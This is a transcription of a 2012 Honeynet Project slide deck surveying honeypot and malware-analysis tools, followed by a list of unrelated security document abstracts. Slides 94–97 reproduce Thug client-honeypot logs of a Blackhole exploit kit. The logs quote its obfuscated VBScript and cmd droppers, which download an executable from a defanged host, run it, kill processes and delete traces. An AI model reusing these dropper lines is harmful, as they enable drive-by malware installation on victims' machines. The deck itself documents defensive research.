Overview of Recent Honeynet Research and Development. CERT.EE 0ct0b3rf3st 18/06/2012
|
|
|
- Sharlene Preston
- 10 years ago
- Views:
Transcription
1 Overview of Recent Honeynet Research and Development CERT.EE 0ct0b3rf3st 18/06/2012 David Watson
2 Speaker David Watson (UK) 15 years managed services industry and consultancy Solaris, IP Networking, Firewalls, PenTest background Led the UK Honeynet Project since 2003 Honeynet Project Chief Research Officer / Director Bootable systems, Honeystick, Honeysnap analysis tool, co-authored KYE: Phishing, KYE reviewer / editor GDH and HonEeeBox lead developer & project manager GSoC org admin, Conficker Working Group Shadowserver Foundation member Director of UK open source consultancy Isotoma Ltd. 2
3 Original Concepts Honeypots Honeynets Low / High interaction Research / Production Data capture Data control Honeywall / Sebek Server Client Automated malware collection, sandboxes Know Your Enemy: Learning About Security Threats ISBN-10: Virtual Honeypots (Niels Provos and Thorsten Holz) ISBN-10:
4 4
5 5
6 6
7 2011/2012 R&D Focus Areas Mobile device honeypots Virtualization honeypots and attacks Topical malware (stuxnet, SCADA, etc) Active defence research (e.g. botnet take down in an ethical manner) Distributed data collection, analysis and visualisation (including HonEeeBox) IPv6 honeynets (tools and deployments) 7
8 Recent Honeynet R&D via Google Summer of Code 8
9 GSoC 2009 Updates: PhoneyC ++ Capture-HPC ++ Nebula ++ PicViz ++ New: Dionaea Glastopf Qebek (QEMU) Hybrid Honeypots Sebek visualization Client honeypot management 9
10 GSoC 2010 Updates: PhoneyC ++ Dionaea / VoIP ++ Capture-HPC ++ New: PHP/RFI Sandbox IM Honeypot Botnet C&C monitor HI server VMI Infected Host DNS TraceExploit Log Anonymization Cuckoo Sandbox /slots 10
11 GSoC 2011 Updates: Capture-HPC ++ Wireshark ++ Cuckoo ++ Dionaea / SIP ++ Shellcode emulation performance ++ New: AxMock Droidbox APKInspector WebViz / HoneyViz HoneySink Hypervizor HonEeeBox / submit_http 11
12 GSoC 2012 Cuckoo ++ HonEeeBox ++ Afterglow ++ Droidbox ++ APKInspector ++ Glastopf ++ Capture-HPC /slots Automated Attack Community Graphs Sensor data mining Network malware simulation IPv6 attack detection HoneyProxy SSL Network analyzer Ghost USB 12
13 Selected GSoC Tool Highlights 13
14 Nepenthes Dionaea Second generation low interaction honeypot Completely rewritten from lessons learned Goals: Detect both known and unknown attacks Better protocol awareness Vulnerability modules in a scripting language Generic shellcode detection via LibEmu Make good use of existing supporting libraries Wider community support for new modules 14
15 Nepenthes Dionaea C with glib LibEv events Embedded Python OpenSSL for TLS Udns (asynch) Curl and Libcfg SQL logging IPv6 support SMB/CIFS protocol emulation for (unknown) RPC calls Generic shellcode detection via LibEmu Actions on shellcode profile (windows shell, file download) via LibEmu execution 15
16 16
17 17
18 Dionaea homepage and URL 18
19 19
20 20
21 21
22 22
23 23
24 24
25 25
26 Glastopf Web Honeypot Minimalistic web server written in Python Scans incoming HTTP request strings Checks for remote file inclusion (RFI), local file inclusion (LFI) and SQL Injection Signatures and dynamic attack detection Attempts to download attack payloads Search keyword indexing to draw in attackers MySQL database plus web console Surfnet.nl data upload plugin 26
27 Glastopf homepage + URL
28 28
29 29
30 30
31 31
32 32
33 33
34 34
35 35
36 Glastopf V3 Currently being developed under DARPA Cyber Fast Track and GSoC (initial release May 2012) Built-in PHP sandbox, code injection emulation, automated attack surface generation & expansion Modular implementation for existing web sites (lightweight Python server or WSGI module in common web server environments) Integrates with botnet monitoring & sandbox systems via HPFeeds 36
37 37
38 AxMock Trace behaviour of WinXP IE7 ActiveX control (manually or client honeypot) Obtain class ID and program ID Emulate/replace behaviour or return null when methods invoked Proxy selected methods, intercept method invokation and modify response Text file config management 38
39 AxMock One module for Capture-HPC AxMock
40 Malicious Webpage AxMock AxMock Log File Function Pointer Address, Argument Value, Argument Type, Argument Address (Taint Source) Vulnerability Semantic Signature Vulnerability Database Signature Database Taint Analysis Variable-level Taint Analysis Trace Log File Tainted Data Flow Trace Log File Tainted Data Type Tainted Data Flow Relationship to Argument, Method, ActiveX Plugin Respectively Symbolic Execution Smart Fuzzing with Variable-Level Symbol Formula SMT Format Random Skip it Symbol
41 More? AxMock, Android, etc 41
42 42
43 Control Flow Graph APKinspector Dalvik, bytecode, smali, Java codes Dangerous permission and the corresponding APIs used call in/ call out relationship
44 44
45 45
46 46
47 47
48 HoneySink 48
49 49
50 50
51 Cuckoo Sandbox Automated malware analysis system Analyze Windows executables, DLL files, PDF documents, Office documents, PHP scripts, Python scripts, Internet URLs, etc Windows guest VMs in Virtual box on Linux Windows hooking / driver plus python modules for extracting and analysing sample executions 51
52 Cuckoo Sandbox Trace of relevant win32 API calls performed Dump network traffic generated (pcap) Creation of screenshots taken during analysis Dump of files created, deleted and downloaded by the malware during analysis Extract trace of assembly instructions executed by malware process 52
53 Cuckoo Sandbox Automate submission of analysis tasks Create analysis packages to define custom analysis operations and procedures Run multiple virtual machines concurrently Script the process and correlation of analysis results data and automate the generation of reports in the format you prefer Version 0.4 coming next month 53
54 54
55 55
56 56
57 57
58 58
59 59
60 60
61 61
62 62
63 63
64 64
65 65
66 66
67 67
68 Updated PicViz Information visualisation application (Python) Generates Parallel Coordinate diagrams from text logs, such as honeypot output Presents high volumes of data with multiple dimensions on a single simple diagram Birds eye view aids human pattern viewing PGDL: Picviz Graphics Description Language Now with added GUI for easy data exploration 68
69
70
71 71
72 PicViz homepage + URL 72
73 73
74 74
75 75
76 76
77 77
78 78
79 WebViz 79
80 HoneyViz 80
81 81
82 Other Recent Non-GSoC Honeynet Tools 82
83 83
84 84
85 85
86 86
87 87
88 88
89 89
90 Thug LI Client Honeypot Low interaction (LI) client honey pots emulate web browser (ie IE on Linux) More scalable than HI but easier to detect Thug replaces PhoneyC ( ) Internal project from Italian Sysenter Chapter Released March 2012 Lessons learned from PhoneyC, but better ;-) Design limitations - DOM + Javascript, plugin detection in exploit kits, extensibility 90
91 Thug LI Client Honeypot Thug + plugin framework new approaches: Document Object Model Thug's DOM almost W3C DOM Core and HTML specifications Levels 1, 2 and partially 3) compliant, partially compliant with W3C DOM Events and Style specifications Easy to add missing features, rather than continue arms race with exploit writers and new kit versions Extensibility through additional python modules and pre/post analysis hooks 91
92 Thug LI Client Honeypot Javascript switched to using Google V8 Javascript engine wrapper through PyV8 Abstract Syntax Tree generation and inspection (static attack sigs, breakpoint mechanism for trapping interesting events for dynamic analysis) Content inspection via V8 debugger protocol plus libemu for shellcode detection and emulation (dynamic analysis) Access entire JS memory/context, clean APIs 92
93 Thug LI Client Honeypot Personalities: 6 browser personalities - IE6-8 on XP/2000, 5-6 lines of code to add more. Chrome and FF coming Python vulnerability modules: activex controls, core browser functions, browser plugins Logging: flat file, MITRE MAEC format, mongodb, HPFeeds events + files Testing: successfully identifies, emulates and logs IE WinXP infections and downloads served PDFs, jars, etc from Blackhole & other attack kits 93
94 Blackhole 1/4 $ python thug.py -v "hxxp://myapp-ups.com/main.php?page=898e350e1897a478" [ :51:06] <applet archive="hxxp://myapp-ups.com/content/gplugin.jar" code="inc.class"><param name="p" test="12" valu="12" value="vssmlgguk7mmahmzpjfugypmvm-vc/oad/g6cr"></param></applet> [ :51:07] Saving applet hxxp://myapp-ups.com/content/gplugin.jar [ :51:07] <param name="p" test="12" valu="12" value="vssmlgguk7mmahmzpjfugypmvm- Vc/oAd/G6cr"></param> [ :51:07] Unknown ActiveX Object: shockwaveflash.shockwaveflash.15 [ :51:07] Unknown ActiveX Object: shockwaveflash.shockwaveflash.14 [ :51:07] Unknown ActiveX Object: shockwaveflash.shockwaveflash.13 [ :51:07] Unknown ActiveX Object: shockwaveflash.shockwaveflash.12 [ :51:07] Unknown ActiveX Object: shockwaveflash.shockwaveflash.11 [ :51:07] [Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (adodb.stream) [ :51:07] [Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (Shell.Application) [ :51:07] [Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (msxml2.xmlhttp) [ :51:07] [Microsoft XMLHTTP ActiveX] Fetching from URL hxxp://myapp-ups.com/w.php?f=97d19&e=2 [ :51:08] [Microsoft XMLHTTP ActiveX] Saving File: eed88603a141913f83bb58b4eacc88cf [ :51:08] [Microsoft XMLHTTP ActiveX] send [ :51:08] [Adodb.Stream ActiveX] open [ :51:08] [Adodb.Stream ActiveX] Write [ :51:08] [Adodb.Stream ActiveX] SaveToFile (.//..//467f705.exe) [ :51:08] [Adodb.Stream ActiveX] Close [ :51:08] [Shell.Application ActiveX] ShellExecute command:.//..//467f705.exe [ :51:08] [Navigator URL Translation]./content/ap1.php?f=97d19 --> hxxp://myapp- ups.com/content/ap1.php?f=97d19 94
95 Blackhole 2/4 [ :51:09] Microsoft Internet Explorer HCP Scheme Detected [ :51:09] Microsoft Windows Help Center Malformed Escape Sequences Incorrect Handling [ :51:09] [AST]: Eval argument length > 64 [ :51:09] [Windows Script Host Run] Command: cmd /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","hxxp://myappups.com/content/hcp_vbs.php?f=97d19&d=0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine.responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe [ :51:09] [Windows Script Host Run - Stage 1] Code: cmd /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","hxxp://myappups.com/content/hcp_vbs.php?f=97d19&d=0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine.responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe [ :51:09] [Windows Script Host Run - Stage 1] Downloading from URL hxxp://myappups.com/content/hcp_vbs.php?f=97d19&d=0 [ :51:09] [Windows Script Host Run - Stage 1] Saving file 2eceb44e291417dc613739fb258e0ac0 95
96 Blackole 3/4 [ :51:09] [Windows Script Host Run - Stage 2] Code: w=3000:x=200:y=1:z=false:a = "hxxp://myapp-ups.com/w.php?e=5&f=97d19":set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")):Set f=e.getspecialfolder(2):b = f & "\exe.ex2":b=replace(b,month(" "),"e"):ot = "GET":Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")):Set d = CreateObject(StrReverse("maertS.BDODA")) Set o=createobject(strreverse("tcejbometsyselif.gnitpircs")) On Error resume next c.open OT, a, z:c.send() If c.status = x Then d.open:d.type = y:d.write c.responsebody:d.savetofile b:d.close End If Set w=createobject(strreverse("llehs." & "tpi"&"rcsw")) Eval(Replace("W.ex2c b", Month(" "), "E")) W.eXeC "taskkill /F /IM wm" & "player.exe":w.exec "taskkill /F /IM realplay.exe":set g=o.getfile(e.getspecialfolder(2) & "\" & StrReverse("bv.l") & "s"):g.delete:wscript.sleep w:set g=o.getfile(b):eval("g.delete") [ :51:09] [Windows Script Host Run - Stage 2] Downloading from URL hxxp://myapp-ups.com/w.php? e=5&f=97d19 [ :51:09] [Windows Script Host Run - Stage 2] Saving file eed88603a141913f83bb58b4eacc88cf 96
97 Blackhole 4/4 [ :51:18] <param name="movie" value="content/field.swf"></param> [ :51:18] [Navigator URL Translation] content/field.swf --> hxxp://myapp-ups.com/content/field.swf [ :51:18] Saving remote content at content/field.swf (MD5: 027ddef75ff4f692196e c3deb) [ :51:18] <param name="allowscriptaccess" value="always"></param> [ :51:18] <param name="play" value="0"></param> [ :51:18] <embed allowscriptaccess="always" height="10" id="swf_id" name="swf_id" src="content/field.swf" type="application/x-shockwave-flash" width="10"></embed> [ :51:18] [Navigator URL Translation] content/field.swf --> hxxp://myapp-ups.com/content/field.swf [ :51:18] Saving remote content at content/field.swf (MD5: 027ddef75ff4f692196e c3deb) [ :51:18] Saving log analysis at../logs/a201092c67a6fecf301a09f8dae985b2/
98 98
99 Ghost USB Honeypot Many successful attacks spread across air gaps using USB flash (Conficker, Stuxnet) Sheep dip disinfection machine is impractical, humans are lazy, policies fail Idea to extend honeypot concept to handle malware propogation via USB devices Implement USB honeypot on production Windows systems and detect airgap sneakernet based malware transmission 99
100 Ghost USB Honeypot Malware can use multiple APIs to detect insertion (ie window messages on device detection by kernel/bus driver) Emulate all possible methods of detecting USB device insertion/removal on Windows Goal to be indistinguishable to real removable physical USB devices 100
101 Ghost USB Honeypot Implement kernel driver, hook at disk.sys disk driver level Ghost bus reports arrivial of Ghost drive I/O requests to Ghost stored as image file Hide ghost USB device from user Periodically emulate virtual USB flashdrive insertion to check for infections Hopefully capture malware written to USB 101
102 Ghost USB Honeypot Version 1 released last week Initial testing shows 8 second average infection time on device insertion (max 35 seconds / min 1 second (Conficker)) Being worked on this summer in HPSoC Eventually package, deploy, manage, report/alert centrally - when screen saver active as host based intrusion dection? 102
103 103
104 104
105 105
106 106
107 107
108 108
109 109
110 110
111 Botsnoopd 111
112 HPFeeds 112
113 113
114 114
115 115
116 116
117 117
118 118
119 119
120 120
121 121
122 HonEeeBox and HPFeeds 122
123 HonEeeBox Approach Build small, cheap, highly portable low interaction honeypots for distributed malware collection to a central location Deploy widely and internationally (100+) Centralised sample submission (anon opt) 'Outsource' malware binary analysis to Shadowserver, VirusTotal, etc Focus development on reporting and analysis UI, then data analysis Add p0f data, netflow, kippo, etc 123
124 Asus Eee PC Box (B202) Intel Atom x86 CPU 1.6 GHz HT 1GB RAM 160GB hard disk Standard PC I/O Hardware warranty Small, quiet, low power, easy to ship (Raspberry Pi?) Minimal Debian Squeeze installation Dionaea + HPFeeds Image or repos Live CD / USB / VM We ship it, you boot it and set locale 124
125 125
126 126
127 127
128 128
129 HonEeeBox Participation 1+ public IP addresses (more is better) 1+ networked x86 PC/server(s) to boot ISO or USB key or space to host HonEeeBox sensor hardware Be willing to submit basic attack data (SRC IP, download URL, MD5, timestamp, binary) Be willing to share collected malware samples with all participants, Project members and partners / sponsors Accept submissions from existing Dionaea sensors Funding for additional sensor deployment Regional, CERT, industry, academic, etc Always need sponsorship ;-) 129
130 130
131 131
132
133
134
135
136
137
138 138
139
140
141
142
143 HonEeeBox Future Shipped 135 sensors, sensors active today Cover low data regions like China, Iran, Korea Aim to demonstrate 100+ distributed sensor nodes with zero day detection operating 24/7 in 2012 Old prototype UI using ExtJS & MySQL backend Moving to Django/Python + HPFeeds from now Improve collaborative development, data sharing and data analysis with the rest of the community Continuous data source for UI and data viz R&D Good outreach and partnerships with community too 143
144 Data Collection Tools Honeyd Honeywall / Hflow Sebek / Qebek Nepenthes / Dionaea LibEmu / Nebula Honeybow / Honeytrap Phoneyc / Trigona Capture-HPC / -Bat GDH / HonEeeBox Cuckoo Sandbox Sinkhole / Wireshark Picviz / Dataviz Droidbox / APKInspector Spampot / IM honeypot Honeymole / Hale Fast Flux Tracker Defacement Tracker Mwcollect / Botsnoopd 144
145 Other Recent R&D Activity 145
146 146
147 147
148
149 149
150 150
151 a 151
152 152
153 Future Research and Development 153
154 Annual Workshop Photos 154
155 2012: Anything Left To Do? More active maintenance of core tools Working high volume client honeypot Mobile honeypots (new or just porting?) Hypervizor layer, OS independent VM introspection for covert data capture/control Enterprise & scalability, operationalisation Visual programming environment for security analysts with big data and collaboration Suggestions later please! 155
156 Many People To Thank All of our GSoC students and mentors / org admins in All of our members for their continuing dedication as motivated volunteers Google for funding Google Summer of Code Community for testing and using our tools plus sharing their research too CERT.EE for hosting us at all at 0ct0b3rf3st You for putting up with a very rapid overview of many different active R&D areas 156
157 Overview of Recent Honeynet Research and Development Any Questions? David Watson
Honeypots & Honeynets Overview. Adli Wahid Security Specialist, APNIC.net [email protected]
Honeypots & Honeynets Overview Adli Wahid Security Specialist, APNIC.net [email protected] 1 Contents 1. ObjecCves 2. DefiniCon of Honeypot & Honeynets 3. Benefits & Risk consideracon 4. Example of Honeypot
Honeypots CERT Exercise Toolset
[Deliverable 2012-10-07] I Contributors to this report The report production was commissioned to CERT Polska (NASK). Authors: Tomasz Grudziecki, Łukasz Juszczyk, Piotr Kijewski (CERT Polska/NASK) Contributors:
Honeypots CERT Exercise Handbook
[Deliverable 2012-10-08] I Contributors to this report The report production was commissioned to CERT Polska (NASK). Authors: Tomasz Grudziecki, Łukasz Juszczyk, Piotr Kijewski (CERT Polska/NASK) Contributors:
CS 558 Internet Systems and Technologies
CS 558 Internet Systems and Technologies Dimitris Deyannis [email protected] 881 Heat seeking Honeypots: Design and Experience Abstract Compromised Web servers are used to perform many malicious activities.
HEY! YOU! GET OFF MY CLOUD! ATTACKS AGAINST CLOUD HONEYPOTS. Martin Lee Neil Rankin
HEY! YOU! GET OFF MY CLOUD! ATTACKS AGAINST CLOUD HONEYPOTS Martin Lee Neil Rankin Cloud Adoption Choose two: Fast Cheap Good Cloud Models Public IaaS PaaS SaaS Private Cloud Models Public IaaS PaaS SaaS
LASTLINE WHITEPAPER. In-Depth Analysis of Malware
LASTLINE WHITEPAPER In-Depth Analysis of Malware Abstract Malware analysis is the process of determining the purpose and functionality of a given malware sample (such as a virus, worm, or Trojan horse).
Networks and Security Lab. Network Forensics
Networks and Security Lab Network Forensics Network Forensics - continued We start off from the previous week s exercises and analyze each trace file in detail. Tools needed: Wireshark and your favorite
EyjafjallajöKull Framework (aka: Exploit Kits Krawler Framework)
EyjafjallajöKull Framework (aka: Exploit Kits Krawler Framework) Seeking Exploit Kits at Large Scale Made Easy By Sébastien Larinier / @Sebdraven & Guillaume Arcas / @y0m This Slide Intentionally Left
Virtualization for Security
Virtualization for Security t j Including Sandboxing, Disaster Recovery, High Availability, Forensic Analysis, and Honeypotting John Hoopes Technical Editor Aaron Bawcom Paul Kenealy Wesley J. Noonan Craig
Sandy. The Malicious Exploit Analysis. http://exploit-analysis.com/ Static Analysis and Dynamic exploit analysis. Garage4Hackers
Sandy The Malicious Exploit Analysis. http://exploit-analysis.com/ Static Analysis and Dynamic exploit analysis About Me! I work as a Researcher for a Global Threat Research firm.! Spoke at the few security
Running a Program on an AVD
Running a Program on an AVD Now that you have a project that builds an application, and an AVD with a system image compatible with the application s build target and API level requirements, you can run
LASTLINE WHITEPAPER. Large-Scale Detection of Malicious Web Pages
LASTLINE WHITEPAPER Large-Scale Detection of Malicious Web Pages Abstract Malicious web pages that host drive-by-download exploits have become a popular means for compromising hosts on the Internet and,
Automating Linux Malware Analysis Using Limon Sandbox Monnappa K A [email protected]
Automating Linux Malware Analysis Using Limon Sandbox Monnappa K A [email protected] A number of devices are running Linux due to its flexibility and open source nature. This has made Linux platform
Comprehensive Malware Detection with SecurityCenter Continuous View and Nessus. February 3, 2015 (Revision 4)
Comprehensive Malware Detection with SecurityCenter Continuous View and Nessus February 3, 2015 (Revision 4) Table of Contents Overview... 3 Malware, Botnet Detection, and Anti-Virus Auditing... 3 Malware
WildFire Cloud File Analysis
WildFire Cloud File Analysis The following topics describe the different methods for sending files to the WildFire Cloud for analysis. Forward Files to the WildFire Cloud Verify Firewall File Forwarding
Example of Standard API
16 Example of Standard API System Call Implementation Typically, a number associated with each system call System call interface maintains a table indexed according to these numbers The system call interface
Malicious Network Traffic Analysis
Malicious Network Traffic Analysis Uncover system intrusions by identifying malicious network activity. There are a tremendous amount of network based attacks to be aware of on the internet today and the
Contents. vii. Preface. P ART I THE HONEYNET 1 Chapter 1 The Beginning 3. Chapter 2 Honeypots 17. xix
Honeynet2_bookTOC.fm Page vii Monday, May 3, 2004 12:00 PM Contents Preface Foreword xix xxvii P ART I THE HONEYNET 1 Chapter 1 The Beginning 3 The Honeynet Project 3 The Information Security Environment
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework [email protected] keralacyberforce.in Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s.
Shellshock. Oz Elisyan & Maxim Zavodchik
Shellshock By Oz Elisyan & Maxim Zavodchik INTRODUCTION Once a high profile vulnerability is released to the public, there will be a lot of people who will use the opportunity to take advantage on vulnerable
Penetration Testing with Kali Linux
Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or
Protecting Your Organisation from Targeted Cyber Intrusion
Protecting Your Organisation from Targeted Cyber Intrusion How the 35 mitigations against targeted cyber intrusion published by Defence Signals Directorate can be implemented on the Microsoft technology
Mobile Application Hacking for Android and iphone. 4-Day Hands-On Course. Syllabus
Mobile Application Hacking for Android and iphone 4-Day Hands-On Course Syllabus Android and iphone Mobile Application Hacking 4-Day Hands-On Course Course description This course will focus on the techniques
3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) [email protected] Open Web Application Security Project http://www.owasp.org
Braindumps.C2150-810.50 questions
Braindumps.C2150-810.50 questions Number: C2150-810 Passing Score: 800 Time Limit: 120 min File Version: 5.3 http://www.gratisexam.com/ -810 IBM Security AppScan Source Edition Implementation This is the
Tunisia s experience in building an ISAC. Haythem EL MIR Technical Manager NACS Head of the Incident Response Team cert-tcc
Tunisia s experience in building an ISAC Haythem EL MIR Technical Manager NACS Head of the Incident Response Team cert-tcc 1 Agenda Introduction ISAC objectives and benefits Tunisian approach SAHER system
nfdump and NfSen 18 th Annual FIRST Conference June 25-30, 2006 Baltimore Peter Haag 2006 SWITCH
18 th Annual FIRST Conference June 25-30, 2006 Baltimore Peter Haag 2006 SWITCH Some operational questions, popping up now and then: Do you see this peek on port 445 as well? What caused this peek on your
Honeypots and Honeynets Technologies
New Mexico State University Honeypots and Honeynets Technologies Hussein Al-Azzawi Final Paper CS 579 Special Topics / Computer Security Nov. 27, 2011 Supervised by Mr. Ivan Strnad Table of contents: 1.
Network Traffic Analysis
2013 Network Traffic Analysis Gerben Kleijn and Terence Nicholls 6/21/2013 Contents Introduction... 3 Lab 1 - Installing the Operating System (OS)... 3 Lab 2 Working with TCPDump... 4 Lab 3 - Installing
Honeypots / honeynets
Honeypots / honeynets presentatie naam 1 Agenda Honeypots Honeynets Honeywall presentatie naam 2 Traffic Problem: Vast quantities of normal traffic Find suspect bits presentatie naam 3 Honeypot Machine
RIA SECURITY TECHNOLOGY
RIA SECURITY TECHNOLOGY Ulysses Wang Security Researcher, Websense Hermes Li Security Researcher, Websense 2009 Websense, Inc. All rights reserved. Agenda RIA Introduction Flash Security Attack Vectors
Sharp Remote Device Manager (SRDM) Server Software Setup Guide
Sharp Remote Device Manager (SRDM) Server Software Setup Guide This Guide explains how to install the software which is required in order to use Sharp Remote Device Manager (SRDM). SRDM is a web-based
Data Collection and Data Analysis in Honeypots and Honeynets
Data Collection and Data Analysis in Honeypots and Honeynets Pavol Sokol, Patrik Pekarčík, Tomáš Bajtoš [email protected], [email protected], [email protected] Institute of Computer
Banking Security using Honeypot
Banking Security using Honeypot Sandeep Chaware D.J.Sanghvi College of Engineering, Mumbai [email protected] Abstract New threats are constantly emerging to the security of organization s information
StruxureWare Data Center Expert 7.2.4 Release Notes
StruxureWare Data Center Expert 7.2.4 Release Notes Table of Contents Page # Part Numbers Affected...... 1 Minimum System Requirements... 1 New Features........ 1 Issues Fixed....3 Known Issues...3 Upgrade
Watch your Flows with NfSen and NFDUMP 50th RIPE Meeting May 3, 2005 Stockholm Peter Haag
Watch your Flows with NfSen and NFDUMP 50th RIPE Meeting May 3, 2005 Stockholm Peter Haag 2005 SWITCH What I am going to present: The Motivation. What are NfSen and nfdump? The Tools in Action. Outlook
Sisense. Product Highlights. www.sisense.com
Sisense Product Highlights Introduction Sisense is a business intelligence solution that simplifies analytics for complex data by offering an end-to-end platform that lets users easily prepare and analyze
Detecting Computer Worms in the Cloud
Detecting Computer Worms in the Cloud Sebastian Biedermann and Stefan Katzenbeisser Security Engineering Group Department of Computer Science Technische Universität Darmstadt {biedermann,katzenbeisser}@seceng.informatik.tu-darmstadt.de
From Georgia, with Love Win32/Georbot. Is someone trying to spy on Georgians?
From Georgia, with Love Win32/Georbot Is someone trying to spy on Georgians? At the beginning of the year, a curious piece of malware came to our attention. An analyst in our virus laboratory noticed that
Mingyu Web Application Firewall (DAS- WAF) - - - All transparent deployment for Web application gateway
Mingyu Web Application Firewall (DAS- WAF) - - - All transparent deployment for Web application gateway All transparent deployment Full HTTPS site defense Prevention of OWASP top 10 Website Acceleration
FORENSIC ANALYSIS Aleš Padrta
FORENSIC ANALYSIS Aleš Padrta CESNET, CESNET-CERTS, FLAB CESNET Czech NREN operator CESNET-CERTS 2004 Established 2008 Accredited CSIRT FLAB Forensic LABoratory Established 6/2011 Support team for CESNET-CERTS
Intrusion Detection Systems (IDS)
Intrusion Detection Systems (IDS) What are They and How do They Work? By Wayne T Work Security Gauntlet Consulting 56 Applewood Lane Naugatuck, CT 06770 203.217.5004 Page 1 6/12/2003 1. Introduction Intrusion
Cyber Security Challenge Australia 2014
Cyber Security Challenge Australia 2014 www.cyberchallenge.com.au CySCA2014 Web Penetration Testing Writeup Background: Pentest the web server that is hosted in the environment at www.fortcerts.cysca Web
USE HONEYPOTS TO KNOW YOUR ENEMIES
USE HONEYPOTS TO KNOW YOUR ENEMIES SHERIF MOUSA (EG-CERT) 9 MAY 2012 WHAT ARE WE GOING TO TALK ABOUT? What exactly happens on the end of your Internet connection. Open Source tools to set up your own Honeypot
Advancements in Botnet Attacks and Malware Distribution
Advancements in Botnet Attacks and Malware Distribution HOPE Conference, New York, July 2012 Aditya K Sood Rohit Bansal Richard J Enbody SecNiche Security Department of Computer Science and Engineering
Network Intrusion Analysis (Hands-on)
Network Intrusion Analysis (Hands-on) TCP/IP protocol suite is the core of the Internet and it is vital to understand how it works together, its strengths and weaknesses and how it can be used to detect
1. Product Information
ORIXCLOUD BACKUP CLIENT USER MANUAL LINUX 1. Product Information Product: Orixcloud Backup Client for Linux Version: 4.1.7 1.1 System Requirements Linux (RedHat, SuSE, Debian and Debian based systems such
LoadRunner and Performance Center v11.52 Technical Awareness Webinar Training
LoadRunner and Performance Center v11.52 Technical Awareness Webinar Training Tony Wong 1 Copyright Copyright 2012 2012 Hewlett-Packard Development Development Company, Company, L.P. The L.P. information
ASL IT SECURITY XTREME XPLOIT DEVELOPMENT
ASL IT SECURITY XTREME XPLOIT DEVELOPMENT V 2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: The most dangerous threat is the one which do not have a CVE. Until now developing reliable exploits
Second-generation (GenII) honeypots
Second-generation (GenII) honeypots Bojan Zdrnja CompSci 725, University of Auckland, Oct 2004. [email protected] Abstract Honeypots are security resources which trap malicious activities, so they
Online Backup Client User Manual Linux
Online Backup Client User Manual Linux 1. Product Information Product: Online Backup Client for Linux Version: 4.1.7 1.1 System Requirements Operating System Linux (RedHat, SuSE, Debian and Debian based
Proof of Concept Guide
Proof of Concept Guide Version 4.0 Published: OCT-2013 Updated: 2005-2013 Propalms Ltd. All rights reserved. The information contained in this document represents the current view of Propalms Ltd. on the
McAfee Product Entitlement Definitions
McAfee Product Entitlement Definitions McAfee. Part of Intel Security. 2821 Mission College Blvd Santa Clara, CA 95054 www.intelsecurity.com Application Server CPU CPU Core Database An Application Server
Kaspersky Small Office Security User Guide
Kaspersky Small Office Security User Guide APPLICATION VERSION: 4.0 Dear User, Thank you for choosing our product. We hope that this document will help you in your work and will provide answers regarding
Kaspersky Endpoint Security 10 for Windows. Deployment guide
Kaspersky Endpoint Security 10 for Windows Deployment guide Introduction Typical Corporate Network Network servers Internet Gateway Workstations Mail servers Portable media Malware Intrusion Routes Viruses
Spyware Doctor Enterprise Technical Data Sheet
Spyware Doctor Enterprise Technical Data Sheet The Best of Breed Anti-Spyware Solution for Businesses Spyware Doctor Enterprise builds on the strength of the industry-leading and multi award-winning Spyware
Virtualization System Vulnerability Discovery Framework. Speaker: Qinghao Tang Title:360 Marvel Team Leader
Virtualization System Vulnerability Discovery Framework Speaker: Qinghao Tang Title:360 Marvel Team Leader 1 360 Marvel Team Established in May 2015, the first professional could computing and virtualization
VESZPROG ANTI-MALWARE TEST BATTERY
VESZPROG ANTI-MALWARE TEST BATTERY 2012 The number of threats increased in large measure in the last few years. A set of unique anti-malware testing procedures have been developed under the aegis of CheckVir
Loophole+ with Ethical Hacking and Penetration Testing
Loophole+ with Ethical Hacking and Penetration Testing Duration Lecture and Demonstration: 15 Hours Security Challenge: 01 Hours Introduction Security can't be guaranteed. As Clint Eastwood once said,
Deep Discovery. Technical details
Deep Discovery Technical details Deep Discovery Technologies DETECT Entry point Lateral Movement Exfiltration 360 Approach Network Monitoring Content Inspection Document Emulation Payload Download Behavior
Network Security Monitoring and Behavior Analysis Pavel Čeleda, Petr Velan, Tomáš Jirsík
Network Security Monitoring and Behavior Analysis Pavel Čeleda, Petr Velan, Tomáš Jirsík {celeda velan jirsik}@ics.muni.cz Part I Introduction P. Čeleda et al. Network Security Monitoring and Behavior
Lesson 06: Basics of Software Development (W02D2
Lesson 06: Basics of Software Development (W02D2) Balboa High School Michael Ferraro Lesson 06: Basics of Software Development (W02D2 Do Now 1. What is the main reason why flash
SyncThru TM Web Admin Service Administrator Manual
SyncThru TM Web Admin Service Administrator Manual 2007 Samsung Electronics Co., Ltd. All rights reserved. This administrator's guide is provided for information purposes only. All information included
Network Security Platform 7.5
M series Release Notes Network Security Platform 7.5 Revision B Contents About this document New features Resolved issues Known issues Installation instructions Product documentation About this document
NOC PS manual. Copyright Maxnet 2009 2015 All rights reserved. Page 1/45 NOC-PS Manuel EN version 1.3
